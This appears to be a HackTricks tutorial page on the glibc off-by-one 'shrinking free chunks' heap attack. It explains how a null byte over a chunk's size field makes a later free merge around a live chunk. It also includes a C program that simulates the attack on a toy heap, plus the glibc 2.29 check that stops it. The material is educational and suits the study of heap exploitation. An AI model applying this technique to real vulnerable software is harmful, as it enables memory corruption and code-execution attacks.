Off by one overflow

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!


Basic Information

Having only a single-byte (1B) overflow is enough for an attacker to corrupt the size field of the chunk that follows the overflowed one. free() relies on that metadata (the size, the PREV_INUSE bit and the prev_size footer derived from it) to decide which neighbouring chunks to consolidate, so the corrupted value can make the allocator merge a region that still contains a legitimately allocated chunk. A later allocation of the merged region then overlaps that chunk.

Code Example:

Goal

  • Make one chunk lie inside another chunk, so that write access to the enclosing chunk overwrites the enclosed one

Requirements

  • An off-by-one overflow that reaches the low byte of the next chunk's size field, which desynchronizes the prev_size metadata the allocator relies on

Attack

  • Three chunks (a, b, c) are allocated one after the other and the middle one (b) is freed. At this point c->prev_size holds b's size and c's PREV_INUSE bit is clear. Chunk a has an off-by-one overflow, and since b's size field sits right after a's usable data, the attacker uses it to write a 0x00 over the least-significant byte of b's size. If that byte was 0x11 (0x10 plus the PREV_INUSE flag), b now claims to be 0x10 bytes smaller than it really is.
  • Two smaller chunks, b1 and b2, are then allocated out of the freed b. Because b is now shorter, the allocator writes the remainder's footer (prev_size) 0x10 bytes before c instead of into c's header (b + b->size no longer reaches c), so c->prev_size keeps the original size of b.
  • Then b1 and c are freed. When c is freed its PREV_INUSE bit is clear and c - c->prev_size still points to the start of the old b (now b1), so the allocator consolidates b1 and c into a single free chunk, even though b2 is still in use in between them.
  • Finally, a new malloc of the right size reclaims the merged chunk, which contains b2, so whoever owns the new allocation can read and write b2's contents.

Two caveats when reproducing this: glibc 2.29 and later abort with "corrupted size vs. prev_size while consolidating" when the chunk found through prev_size does not have that size, so this exact sequence needs an older glibc; and on glibc versions with tcache the chunk sizes must be outside the tcache range (or the tcache bins filled) so that free() really places the chunks in the unsorted bin and performs consolidation.
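The following is an added example, not code from HackTricks or from glibc: a small simulated heap that reproduces glibc's chunk header layout (prev_size, size | PREV_INUSE, user data overlapping the next prev_size), the split-on-malloc and backward-consolidation-on-free logic, and then runs the a/b/c sequence above. The sizes 0x100/0x200/0x100 and 0x80, the function names (toy_malloc, toy_free, run_attack) and the single-free-chunk model are assumptions made for the illustration; tcache, fastbins and forward consolidation are deliberately left out. The hardened flag emulates the glibc 2.29 "corrupted size vs. prev_size while consolidating" check so you can see the step at which a modern allocator would abort.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Toy model of glibc's in-band chunk metadata, written for this page (not glibc code).
 * Chunk at offset p:  p+0  prev_size (valid only while the previous chunk is free)
 *                     p+8  size | PREV_INUSE
 *                     p+16 user data, which extends into the next chunk's prev_size,
 *                          so a 0x110 chunk has 0x108 usable bytes.
 * One free chunk is tracked and only backward consolidation is modelled;
 * tcache, fastbins and forward consolidation are omitted (the attack does not use them). */
#define PREV_INUSE 1ULL
#define HEAP_SIZE  0x1000

static _Alignas(16) unsigned char heap[HEAP_SIZE];
static size_t top_off;    /* start of the untouched "top chunk" */
static size_t free_off;   /* offset of the tracked free chunk */
static int have_free;
static int hardened;      /* 1 = emulate the glibc >= 2.29 consolidation check */
static int aborted;       /* set when that check fires */

static uint64_t get64(size_t off) { uint64_t v; memcpy(&v, heap + off, 8); return v; }
static void set64(size_t off, uint64_t v) { memcpy(heap + off, &v, 8); }
static size_t chunksize(size_t p)  { return (size_t)(get64(p + 8) & ~0xfULL); }
static int prev_inuse(size_t p)    { return (int)(get64(p + 8) & PREV_INUSE); }
static size_t request2size(size_t req) { return (req + 8 + 15) & ~(size_t)15; }

static void heap_reset(int harden) {
    memset(heap, 0, sizeof heap);
    top_off = 0; have_free = 0; hardened = harden; aborted = 0;
}

/* malloc: serve from the free chunk (splitting like glibc does) or from top. */
static size_t toy_malloc(size_t req) {
    size_t nb = request2size(req), victim;
    if (have_free && chunksize(free_off) >= nb) {
        victim = free_off;
        size_t rem = chunksize(victim) - nb;
        if (rem >= 0x20) {                          /* split; remainder stays free */
            set64(victim + 8, nb | PREV_INUSE);
            set64(victim + nb + 8, rem | PREV_INUSE);
            set64(victim + nb + rem, rem);          /* set_foot: remainder's footer */
            free_off = victim + nb;
        } else {                                    /* too small to split: whole chunk */
            set64(victim + 8, chunksize(victim) | PREV_INUSE);
            size_t next = victim + chunksize(victim);
            set64(next + 8, get64(next + 8) | PREV_INUSE);
            have_free = 0;
        }
    } else {
        victim = top_off;
        set64(victim + 8, nb | PREV_INUSE);
        top_off += nb;
    }
    return victim;
}

/* free: consolidate backwards through prev_size when PREV_INUSE is clear,
 * then publish the (possibly merged) chunk as free. */
static void toy_free(size_t p) {
    size_t size = chunksize(p);
    if (!prev_inuse(p)) {
        size_t prevsize = (size_t)get64(p);
        size_t prev = p - prevsize;
        /* glibc >= 2.29: "corrupted size vs. prev_size while consolidating" */
        if (hardened && chunksize(prev) != prevsize) { aborted = 1; return; }
        size += prevsize;
        p = prev;
    }
    set64(p + 8, size | PREV_INUSE);
    set64(p + size, size);                                   /* set_foot */
    set64(p + size + 8, get64(p + size + 8) & ~PREV_INUSE);  /* next chunk: prev is free */
    free_off = p; have_free = 1;
}

/* The attack from the text. Returns 1 when the final allocation contains b2 and
 * writing through it changed b2's data; 0 when the hardened check aborted. */
static int run_attack(int harden) {
    heap_reset(harden);
    size_t a = toy_malloc(0x100), b = toy_malloc(0x200), c = toy_malloc(0x100);
    toy_free(b);                       /* c->prev_size = 0x210, c's PREV_INUSE cleared */
    unsigned char *user_a = heap + a + 0x10;
    user_a[0x108] = 0x00;              /* off-by-one: byte 0x108 of a 0x108-byte buffer is b's size LSB */
    /* b's header now reads 0x200 instead of 0x211: 0x10 shorter, PREV_INUSE lost */
    size_t b1 = toy_malloc(0x100);     /* remainder footer lands 0x10 before c; c->prev_size untouched */
    size_t b2 = toy_malloc(0x80);
    size_t b2_end = b2 + chunksize(b2);
    toy_free(b1);
    toy_free(c);                       /* c - c->prev_size == b1: merges b1..c over b2 */
    if (aborted) return 0;
    size_t big = toy_malloc(0x300);    /* reclaims the merged 0x320 chunk */
    memset(heap + big + 0x10, 'A', 0x300);
    return big <= b2 && b2_end <= big + chunksize(big) && heap[b2 + 0x10] == 'A';
}

int main(void) {
    int r = run_attack(0);
    printf("pre-2.29 model : attacker controls b2 = %d\n", r);
    r = run_attack(1);
    printf("2.29+ model    : attacker controls b2 = %d, aborted = %d\n", r, aborted);
    return 0;
}
```

Compile with `cc -std=c11 shrink.c && ./a.out`. The unhardened run ends with a 0x320-byte chunk starting at b1 that swallows b2, and the memset through the new allocation lands in b2's user data; the hardened run stops inside toy_free(c) because the chunk found at c - 0x210 has size 0x110, not 0x210, which is exactly the inconsistency the off-by-one introduced.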

The attack is illustrated step by step, with a diagram of the chunk layout at each stage, in the following reference.

References

  • https://heap-exploitation.dhavalkapil.com/attacks/shrinking_free_chunks
